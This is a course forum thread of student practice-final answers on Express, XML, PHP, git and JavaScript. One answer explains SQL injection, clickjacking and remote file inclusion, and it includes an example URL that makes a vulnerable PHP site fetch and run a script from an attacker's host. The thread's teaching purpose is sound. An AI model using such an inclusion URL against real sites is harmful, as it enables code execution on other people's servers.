2020-12-01

Practice Final.

Post your solutions to your practice final problem to this thread. Make sure to include the names of all your teammates.
Best,
Chris
2020-12-07

-- Practice Final
Breakout room 5: Chris Douglas, George Michael Cuevas, Zihao Lin
10.a Suppose in the folder /src/public there are some HTML pages.
const express = require('express')
const router = express()
router.listen('5002', () => {
    console.log('listening on 5002');
});
// serve a specific HTML file (sendFile needs an absolute path)
router.get('/servehtmlfile', (req, res) => {
    res.sendFile('/src/public/index.html')
})
// serve inline HTML
router.get('/servehtmlinline', function (req, res) {
    res.send('<div><h1>Welcome</h1></div>');
});
// express automatically picks up ./src/public/index.html
router.use(express.static('./src/public'))
b. One quick way to extract values from a POST form is using body parser.
<!DOCTYPE html>
<head> </head>
<body>
<form name="newList" method="post" action="/test">
    <input type="text" name="FirstName" placeholder="FirstName" />
    <input type="hidden" name="LastName" placeholder="LastName"/>
    <input type="submit" value="submit" />
</form>
</body>
const express = require('express');
const bodyParser = require('body-parser');
const app = express()
app.listen('5000', () => {
    console.log('listening on 5000');
});
// an HTML form is posted as application/x-www-form-urlencoded, so use the urlencoded parser
app.use(bodyParser.urlencoded({ extended: false }));
app.post('/test', (req, res) => {
  let lastName = req.body["LastName"]
  let firstName = req.body["FirstName"]
  res.sendStatus(200) // end the request so the browser is not left waiting
});
(Edited: 2020-12-07)

-- Practice Final
Breakout room 5: Chris Douglas, George Michael Cuevas, Zihao Lin
9a. An SQL injection attack is where you insert and submit SQL code into a form. The server will then try to process this form and run a SQL query with the form data on the database. For example, Batman might try to get the Joker in trouble with the IRS (because no one is crazy enough to mess with the IRS) and he might submit a form that updates the Joker's income in the IRS' database. This will cause the Joker to get audited.
9b. In clickjacking, the user goes into a malicious site whose UI looks legitimate. Secretly, an iframe is loaded and with CSS the opacity is set to 0. The page is positioned over the iframe page that might have a button that catches the user’s attention. An example of this is I really like Pikachu. Let’s say for some reason I go into a malicious site where it says that I can win a 6ft giant Pikachu plush. It asks to fill out a form with name and address and click submit. What I don’t know is that I’m being clickjacked. The attacker wants me to click the submit button to purchase something without me knowing.
9c. Let’s say I own a site called RoadRunner.com. I’m lazy and my site is vulnerable to allow_url_fopen and/or allow_url_include because they are set to true in the php.ini file. To attack my site, the attacker types: http://RoadRunner.com/?c=http://www.WileECoyote.com/evilscript.php. Then evilscript.php is used to run my machine with webserver privileges giving them access to the webserver.
(Edited: 2020-12-07)

-- Practice Final
6. With Trevor Glassey and Caleb Nale
function validatem() {
    let inputs = document.getElementsByTagName("input");
    var i;
    for (i=0; i<inputs.length; i++) {
        if(inputs[i].value.includes("1234")){
            alert("Hey, you're not me");
            return false;
        }
    }
    return true;
}
(Edited: 2020-12-07)

-- Practice Final
Trey Smith, Luksawee Phansri, Sachin Shah
7)
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to, from, date, people)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT date (#PCDATA)>
<!ELEMENT people (#PCDATA)>
]>

<note>
  <to>Tove</to>
  <from>Dan and Ann</from>
  <date>Feb 28, 201</date>
  <people>a, b, c, d</people>
</note>
Problem 8
a) C10K: The problem that servers face when they have over 10,000 clients and a limited thread pool. Inability to handle all incoming requests.
b) REST: A way for clients to communicate with one another via HTTP. REST APIs allow for GET, POST, UPDATE, and DELETE requests to be performed by applications to their backend.
c) Promise:
const axios = require('axios');
let getData = new Promise(function(resolve, reject) {
    // axios.get returns a promise, so settle on its outcome instead of testing its truthiness
    axios.get('https://api.github.com/users/mapbox')
        .then(() => resolve('Data was received'))
        .catch(() => reject('Data was not received'));
});

-- Practice Final
5. With Huynh Phan and Caleb Nale
Describe how the value of an object property is looked up in JavaScript.
When JavaScript looks up an object property, it first checks if that property is defined in that instance. If it is not found, it then checks the prototype object to see if the property is defined there. If not, since the prototype is also an object, it will check its prototype, and continue on until there are no more prototypes to check. Example:
  • b = new Object()
  • b.thing = "hi"
  • b.thing2 = "pi"
  • a = new Object()
  • Object.setPrototypeOf(a, b) // make b the prototype of a
  • a.thing = "li"
  • b.thing // equals "hi"
  • a.thing // equals "li"
  • a.thing2 // equals "pi"
  • a.thing3 // equals undefined
(Edited: 2020-12-07)

-- Practice Final
3. Thomas Wang, Justin Nguyen, Shubham Patel “In directory Thanos”
	git init Thanos
	git add randomFile
	git commit -m "added randomFile"
	git add newFile
	git commit -m "added newFile"
	git add myFile
	git commit -m "added myFile"
	git format-patch -2 --stdout > my.patch
(Edited: 2020-12-07)

-- Practice Final
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Invitation [
<!ELEMENT Invitation (Bride, Groom, Date)>
<!ELEMENT Bride (#PCDATA)>
<!ELEMENT Groom (#PCDATA)>
<!ELEMENT Date (#PCDATA)>
<!ATTLIST Invitation RSVP CDATA #FIXED "RSVP">
]>
<Invitation>
  <Bride>LuksaweeP</Bride>
  <Groom>DoNotKnow</Groom>
  <Date>Dec 31, 2021</Date>
</Invitation>
(Edited: 2020-12-08)

-- Practice Final
Colin Chow, Crispino Madamba, Janice Lu
Problem 1
<?php
  $db = mysqli_connect('localhost', 'root', null, "group1");
  if(!$db) {
   die("Connection failed: " . mysqli_connect_error());
  }
  $resultsArray = array();
  $selecttablestatement = "SELECT name from Employee where birthDate = '1997-04-20'";
  $results = mysqli_query($db, $selecttablestatement);
  $i = 0;
  if(mysqli_num_rows($results) > 0) {
    while($row = mysqli_fetch_assoc($results)) {
      $resultsArray[$i] = $row["name"];
      $i++;
    }
    echo "<ol>";
    for($j=0; $j<count($resultsArray); $j++) {
      // escape database values before writing them into HTML
      echo "<li>".htmlspecialchars($resultsArray[$j])."</li>";
    }
    echo "</ol>";
  } else {
    echo "No matching results";
  }
Problem 2
An autoloader allows for the developer to avoid using numerous requires in each file. It will also allow for the project to automatically detect and search for new class files and their location so that they can be used in any file.
<?php
// An autoloader allows us to minimize the number of files read before
// executing code, saving memory space.
if (file_exists(__DIR__."/../../vendor/autoload.php")) {
  require_once __DIR__."/../../vendor/autoload.php";
} else {
  spl_autoload_register(function ($class) {
    // project-specific namespace prefix
    $prefix = 'student\\fName\\Crispino';
    // does the class use the namespace prefix?
    $len = strlen($prefix);
    if (strncmp($prefix, $class, $len) !== 0) {
      $prefix = 'student\\fName';
      $len = strlen($prefix);
      // no, move to the next registered autoloader
      if (strncmp($prefix, $class, $len) !== 0) {
        return;
      } else {
        $check_dirs = [WORK_DIRECTORY . "/app", BASE_DIR];
      }
    } else {
      $check_dirs = [PARENT_DIR . "/tests"];
    }
    // get the relative class name
    $relative_class = substr($class, $len);
    // use forward slashes, add .php
    $unixify_class_name = "/".str_replace('\\', '/', $relative_class) .
    '.php';
    foreach($check_dirs as $dir) {
      $file = $dir . $unixify_class_name;
      if (file_exists($file)) {
        require $file;
        break;
      }
    }
  });
  }
(Edited: 2020-12-07)

-- Practice Final
Group 2: Justin Nguyen, Shubham Patel, Thomas Wang Question 4:
function descendingNameNumbers(args) {
    const numbers = [];
    const resultArray = [];
    args.forEach(arg => {
        if(Number.isFinite(arg)) {
            numbers.push(arg);
        }
    })
    numbers.sort((a, b) => {
        return b-a;
    });
    numbers.forEach(item => {
        resultArray.push("Wang"+item);
    })
    console.log(resultArray);
} 
 
const values = [2.3, 3, "lala", 1, [0, 1], {o:"yeah"}]; 
 
descendingNameNumbers(values);